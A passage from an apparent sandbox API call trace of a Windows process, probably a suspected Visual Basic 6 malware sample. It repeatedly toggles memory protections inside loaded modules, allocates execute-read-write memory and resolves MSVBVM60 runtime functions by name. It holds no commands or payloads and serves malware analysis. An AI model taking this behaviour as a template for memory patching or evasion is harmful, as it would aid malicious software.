BaseAddress=0x28fbec*=0x755c0018, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.204] GetCurrentProcess () returned 0xffffffff [0132.205] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755c0018, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.205] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755c0020, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.205] GetCurrentProcess () returned 0xffffffff [0132.205] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755c0020, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.206] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755c00ac, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.206] GetCurrentProcess () returned 0xffffffff [0132.206] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755c00ac, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.207] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755c00b4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.207] GetCurrentProcess () returned 0xffffffff [0132.207] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755c00b4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.208] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.209] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755a1060, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755a1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.209] GetCurrentProcess () returned 0xffffffff [0132.209] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755a1060, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755a1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.210] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755a109c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755a1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.211] GetCurrentProcess () returned 0xffffffff [0132.211] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755a109c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755a1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.211] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755a10a4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755a1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.211] GetCurrentProcess () returned 0xffffffff [0132.211] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755a10a4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755a1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.212] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.213] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1238, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.214] GetCurrentProcess () returned 0xffffffff [0132.214] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1238, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.214] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1258, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.214] GetCurrentProcess () returned 0xffffffff [0132.215] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1258, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.215] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1260, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.215] GetCurrentProcess () returned 0xffffffff [0132.215] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1260, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.216] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1268, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.216] GetCurrentProcess () returned 0xffffffff [0132.216] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1268, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.216] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d12c4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.217] GetCurrentProcess () returned 0xffffffff [0132.217] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d12c4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.217] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d12c8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.218] GetCurrentProcess () returned 0xffffffff [0132.218] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d12c8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.218] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d12cc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.219] GetCurrentProcess () returned 0xffffffff [0132.219] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d12cc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.219] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1300, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.219] GetCurrentProcess () returned 0xffffffff [0132.219] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1300, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.220] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1308, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.220] GetCurrentProcess () returned 0xffffffff [0132.220] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1308, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.221] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d132c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.221] GetCurrentProcess () returned 0xffffffff [0132.221] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d132c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.222] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1384, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.222] GetCurrentProcess () returned 0xffffffff [0132.222] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1384, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.222] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1390, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.223] GetCurrentProcess () returned 0xffffffff [0132.224] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.231] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.234] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.241] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.250] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.260] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.268] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.277] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.282] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.283] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.287] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.290] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 0 [0132.290] CloseHandle (hObject=0x124) returned 1 [0132.290] GetLastError () returned 0x12 [0132.291] SetLastError (dwErrCode=0x12) [0132.374] GetLastError () returned 0x12 [0132.374] SetLastError (dwErrCode=0x12) [0132.374] GetLastError () returned 0x12 [0132.375] SetLastError (dwErrCode=0x12) [0132.375] VirtualAlloc (lpAddress=0x3374000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x3374000 [0132.378] VirtualFree (lpAddress=0x3374000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0132.380] GetLastError () returned 0x12 [0132.380] SetLastError (dwErrCode=0x12) [0132.380] GetLastError () returned 0x12 [0132.381] SetLastError (dwErrCode=0x12) [0132.381] GetLastError () returned 0x12 [0132.381] SetLastError (dwErrCode=0x12) [0132.550] GetLastError () returned 0x12 [0132.550] SetLastError (dwErrCode=0x12) [0132.550] GetLastError () returned 0x12 [0132.550] SetLastError (dwErrCode=0x12) [0132.550] GetLastError () returned 0x12 [0132.551] SetLastError (dwErrCode=0x12) [0132.650] VirtualAlloc (lpAddress=0x3374000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x3374000 [0132.653] VirtualFree (lpAddress=0x3374000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0132.655] GetLastError () returned 0x12 [0132.656] SetLastError (dwErrCode=0x12) [0132.656] GetLastError () returned 0x12 [0132.656] SetLastError (dwErrCode=0x12) [0132.656] GetLastError () returned 0x12 [0132.656] SetLastError (dwErrCode=0x12) [0132.656] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0132.656] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0132.656] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0132.656] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0132.656] GetLastError () returned 0x12 [0132.656] SetLastError (dwErrCode=0x12) [0132.657] GetLastError () returned 0x12 [0132.657] SetLastError (dwErrCode=0x12) [0132.657] GetLastError () returned 0x12 [0132.657] SetLastError (dwErrCode=0x12) [0132.707] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0132.707] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0132.707] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0132.707] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0132.707] GetLastError () returned 0x12 [0132.708] SetLastError (dwErrCode=0x12) [0132.708] GetLastError () returned 0x12 [0132.708] SetLastError (dwErrCode=0x12) [0132.708] GetLastError () returned 0x12 [0132.708] SetLastError (dwErrCode=0x12) [0132.708] VirtualAlloc (lpAddress=0x3374000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x40) returned 0x3374000 [0132.715] VirtualFree (lpAddress=0x3374000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0132.715] VirtualAlloc (lpAddress=0x3374000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3374000 [0132.716] VirtualFree (lpAddress=0x3374000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0132.718] GetLastError () returned 0x12 [0132.718] SetLastError (dwErrCode=0x12) [0132.774] GetLastError () returned 0x12 [0132.775] SetLastError (dwErrCode=0x12) [0132.775] GetLastError () returned 0x12 [0132.775] SetLastError (dwErrCode=0x12) [0132.775] VirtualAlloc (lpAddress=0x3374000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x3374000 [0132.778] VirtualFree (lpAddress=0x3374000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0132.780] GetLastError () returned 0x12 [0132.780] SetLastError (dwErrCode=0x12) [0132.833] GetLastError () returned 0x12 [0132.833] SetLastError (dwErrCode=0x12) [0132.834] GetLastError () returned 0x12 [0132.834] SetLastError (dwErrCode=0x12) [0132.834] GetLastError () returned 0x12 [0132.834] SetLastError (dwErrCode=0x12) [0132.834] GetLastError () returned 0x12 [0132.834] SetLastError (dwErrCode=0x12) [0132.888] GetLastError () returned 0x12 [0132.888] SetLastError (dwErrCode=0x12) [0132.888] GetLastError () returned 0x12 [0132.888] SetLastError (dwErrCode=0x12) [0132.888] GetLastError () returned 0x12 [0132.889] SetLastError (dwErrCode=0x12) [0132.945] GetLastError () returned 0x12 [0132.945] SetLastError (dwErrCode=0x12) [0132.945] GetLastError () returned 0x12 [0132.945] SetLastError (dwErrCode=0x12) [0132.998] GetLastError () returned 0x12 [0132.999] SetLastError (dwErrCode=0x12) [0132.999] GetLastError () returned 0x12 [0132.999] SetLastError (dwErrCode=0x12) [0132.999] GetLastError () returned 0x12 [0132.999] SetLastError (dwErrCode=0x12) [0133.190] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0133.191] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0133.191] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0133.192] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0133.192] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0133.192] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0133.193] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0133.193] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0133.193] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0133.194] GetLastError () returned 0x0 [0133.194] SetLastError (dwErrCode=0x0) [0133.194] GetLastError () returned 0x0 [0133.194] SetLastError (dwErrCode=0x0) [0133.194] GetLastError () returned 0x0 [0133.194] SetLastError (dwErrCode=0x0) [0133.341] VirtualAlloc (lpAddress=0x3374000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x40) returned 0x3374000 [0133.343] VirtualFree (lpAddress=0x337c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0133.344] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="MSVBVM60.DLL", cbMultiByte=12, lpWideCharStr=0x28edd0, cchWideChar=2047 | out: lpWideCharStr="MSVBVM60.DLL䕁㑂ぁ㘳㜵㔵㙆䈭㘸䌲䕁㠹䔴㑁い居㈰う䘱㔵䄳ㄱ䐲䕃〭䌰䐹㍂䌸㠱㕄䑆┱ĕ(䘨睝◤ĕ(V") returned 12 [0133.344] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="MSVBVM60.DLL", cchWideChar=12, lpMultiByteStr=0x28edd0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSVBVM60.DLL6", lpUsedDefaultChar=0x0) returned 12 [0133.345] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarSub" | out: DestinationString="__vbaVarSub") [0133.345] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarSub", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a477ea) returned 0x0 [0133.346] RtlInitString (in: DestinationString=0x28fda8, SourceString="_CIcos" | out: DestinationString="_CIcos") [0133.346] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_CIcos", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a39386) returned 0x0 [0133.347] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fptan" | out: DestinationString="_adj_fptan") [0133.347] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fptan", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a309f9) returned 0x0 [0133.348] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarMove" | out: DestinationString="__vbaVarMove") [0133.348] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarMove", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a46aee) returned 0x0 [0133.349] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaFreeVar" | out: DestinationString="__vbaFreeVar") [0133.349] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaFreeVar", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a46831) returned 0x0 [0133.349] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaLenBstr" | out: DestinationString="__vbaLenBstr") [0133.349] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaLenBstr", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a26a9b) returned 0x0 [0133.350] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaStrVarMove" | out: DestinationString="__vbaStrVarMove") [0133.350] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaStrVarMove", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a21929) returned 0x0 [0133.351] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaPut3" | out: DestinationString="__vbaPut3") [0133.351] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaPut3", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a256fa) returned 0x0 [0133.351] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaFreeVarList" | out: DestinationString="__vbaFreeVarList") [0133.352] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaFreeVarList", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a47262) returned 0x0 [0133.352] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaEnd" | out: DestinationString="__vbaEnd") [0133.352] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaEnd", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a0be88) returned 0x0 [0133.353] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fdiv_m64" | out: DestinationString="_adj_fdiv_m64") [0133.353] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fdiv_m64", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a302ba) returned 0x0 [0133.354] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaNextEachVar" | out: DestinationString="__vbaNextEachVar") [0133.354] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaNextEachVar", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a463bc) returned 0x0 [0133.354] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaFreeObjList" | out: DestinationString="__vbaFreeObjList") [0133.354] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaFreeObjList", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a19fc3) returned 0x0 [0133.355] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x204, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a270b7) returned 0x0 [0133.355] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fprem1" | out: DestinationString="_adj_fprem1") [0133.355] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fprem1", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a30941) returned 0x0 [0133.356] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaStrCat" | out: DestinationString="__vbaStrCat") [0133.356] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaStrCat", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a26a76) returned 0x0 [0133.357] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarCmpNe" | out: 